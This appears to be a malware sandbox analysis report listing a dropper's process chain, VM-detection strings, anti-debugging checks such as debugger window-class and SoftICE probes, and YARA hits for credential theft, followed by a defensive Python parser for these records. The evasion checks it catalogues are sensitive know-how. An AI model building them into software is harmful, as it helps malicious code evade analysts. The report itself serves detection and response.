Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: firefox.exe, 0000001E.00000003.2957174991.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC6A2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VBoxService.exe
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 0000001B.00000002.3277320082.0000000001EA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VMWare
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: firefox.exe, 0000001E.00000003.2957174991.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC6A2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Thread information set: HideFromDebugger
Source: C:\Users\userAKKKFBGDHJ.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Code function: 5_2_04D401D4 Start: 04D404E5 End: 04D40224 5_2_04D401D4
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process queried: DebugPort
Source: C:\Users\userAKKKFBGDHJ.exe Process queried: DebugPort
Source: C:\Users\userAKKKFBGDHJ.exe Process queried: DebugPort
Source: C:\Users\userAKKKFBGDHJ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Code function: 5_2_04D40CDC rdtsc 5_2_04D40CDC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C5DB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C5DB1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C78AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 8016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 6648, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe"
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAKKKFBGDHJ.exe "C:\Users\userAKKKFBGDHJ.exe"
Source: C:\Users\userAKKKFBGDHJ.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe "C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: bdb44f72d9.exe, 00000017.00000002.3241866502.0000000000372000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RoamingCFCGIIEHIE.exe, RoamingCFCGIIEHIE.exe, 00000005.00000002.2234128926.000000000054C000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2272766960.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000A.00000002.2271816286.000000000058C000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Program Manager
Source: userAKKKFBGDHJ.exe, userAKKKFBGDHJ.exe, 00000008.00000002.2311861747.000000000022E000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000010.00000002.2340574498.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000012.00000002.3243966824.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: ,cDProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB341 cpuid 0_2_6C5DB341
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\624f4d727e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0
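The Anti Debugging section above and the "Process created:" lines of this section are plain-text "Source: <process> <Check>: <value>" records. The following is an added example for this page (not code from the sandbox vendor or from the malware families named in the report) that parses those records and answers the two questions a responder asks first: which dropped binary performed which anti-analysis check (HideFromDebugger, DebugPort, window-name and SoftICE device probes), and what the process chain from file.exe down to the final payloads looks like. The SAMPLE lines are copied from this report, including the trailing "Jump to behavior" link label the sandbox's HTML attaches to some lines, which the parser tolerates; the function names and the layout of the returned dicts are this example's own choices.

```python
"""Turn the report's behaviour lines into structured indicators (added example)."""
import re
from collections import defaultdict

# One behaviour line: "Source: <process> <Check>: <value>[ Jump to behavior]".
CHECK_RE = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<check>Thread information set|Process queried|"
    r"Open window title or class name|File opened|Process created): "
    r"(?P<val>.+?)(?: Jump to behavior)?$"
)

# Device names the report shows being opened: the classic SoftICE probe.
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}

# Lines copied from this report (a subset; the full report has many more).
SAMPLE = r'''
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe "C:\Users\user\AppData\RoamingCFCGIIEHIE.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe "C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
'''


def parse_lines(text):
    """Yield (source, check, value) for every line that is a behaviour record."""
    for line in text.splitlines():
        m = CHECK_RE.match(line.strip())
        if m:
            yield m["src"], m["check"], m["val"]


def anti_analysis_summary(text):
    """Per process: HideFromDebugger / DebugPort counts plus the window names
    and SoftICE devices it probed. Processes with no such check are omitted."""
    out = defaultdict(lambda: {"HideFromDebugger": 0, "DebugPort": 0,
                               "windows": set(), "devices": set()})
    for src, check, val in parse_lines(text):
        if check == "Thread information set" and val == "HideFromDebugger":
            out[src]["HideFromDebugger"] += 1
        elif check == "Process queried" and val == "DebugPort":
            out[src]["DebugPort"] += 1
        elif check == "Open window title or class name":
            out[src]["windows"].add(val)
        elif check == "File opened" and val in SOFTICE_DEVICES:
            out[src]["devices"].add(val)
    return {src: {**d, "windows": sorted(d["windows"]), "devices": sorted(d["devices"])}
            for src, d in out.items()}


def process_tree(text):
    """parent image path -> list of (child image path, child command line)."""
    tree = defaultdict(list)
    for src, check, val in parse_lines(text):
        if check != "Process created":
            continue
        # Value is '<image path> "<command line...>'. The image path may itself
        # contain spaces (Program Files), so split at the first space-quote pair.
        child, sep, rest = val.partition(' "')
        tree[src].append((child, '"' + rest if sep else ""))
    return dict(tree)


def chain_to(text, leaf):
    """Ancestry from the root process down to `leaf`, derived from process_tree."""
    parent_of = {child: parent
                 for parent, kids in process_tree(text).items()
                 for child, _ in kids}
    chain, node = [leaf], leaf
    while node in parent_of and parent_of[node] not in chain:  # cycle guard
        node = parent_of[node]
        chain.append(node)
    return chain[::-1]


if __name__ == "__main__":
    for proc, d in anti_analysis_summary(SAMPLE).items():
        print(proc, d)
    print(" -> ".join(chain_to(SAMPLE, r"C:\Program Files\Mozilla Firefox\firefox.exe")))
```

The window-name list is the part worth feeding back into a sandbox or analyst VM: every class name explorti.exe looks for (regmonclass, procmon_window_class, ollydbg and so on) is one to rename or hide before re-running the sample, and the chain output is the order in which the dropped binaries need to be blocked or collected.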

Stealing of Sensitive Information

Source: Yara match File source: 19.2.explorti.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.axplong.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.userAKKKFBGDHJ.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.axplong.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RoamingCFCGIIEHIE.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.2223307017.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2311565762.0000000000041000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2231516085.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2272266422.00000000003A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2671470506.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2299903441.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2193493268.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2229306012.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2233910747.0000000000361000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2270763682.00000000003A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3241989382.00000000003A1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2340448283.00000000007F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3241787684.00000000007F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2669468186.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
